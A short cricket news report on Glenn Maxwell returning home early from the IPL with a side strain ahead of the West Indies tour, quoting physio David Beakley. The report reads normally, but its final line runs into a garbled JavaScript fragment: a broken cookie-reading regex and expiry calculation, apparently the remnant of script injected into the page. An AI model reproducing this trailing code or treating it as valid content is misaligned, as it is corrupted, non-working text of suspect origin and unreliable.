Glenn Maxwell has joined the growing list of Australians heading home early form the Indian Premier League due to injury.

Maxwell has returned home due to a side strain to ensure he is fit to take on the West Indies in the one-day series in the Caribbean in June.

"Glenn reported increasing soreness in his left abdomen area following last night's match and as such a decision was made for him to return home for further assessment and treatment ahead of the West Indies tour," Cricket Australia Support Team Physio David Beakley said.

"From the information we have so far, the injury doesn’t appear to be something that will prevent Glenn from participating in this tour,  but we are keen to give him the necessary time to recover before departing to the West Indies at the end of this month."

Maxwell joins Shaun and Mitch Marsh, Steve Smith and John Hastings in leaving the IPL early with injury. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
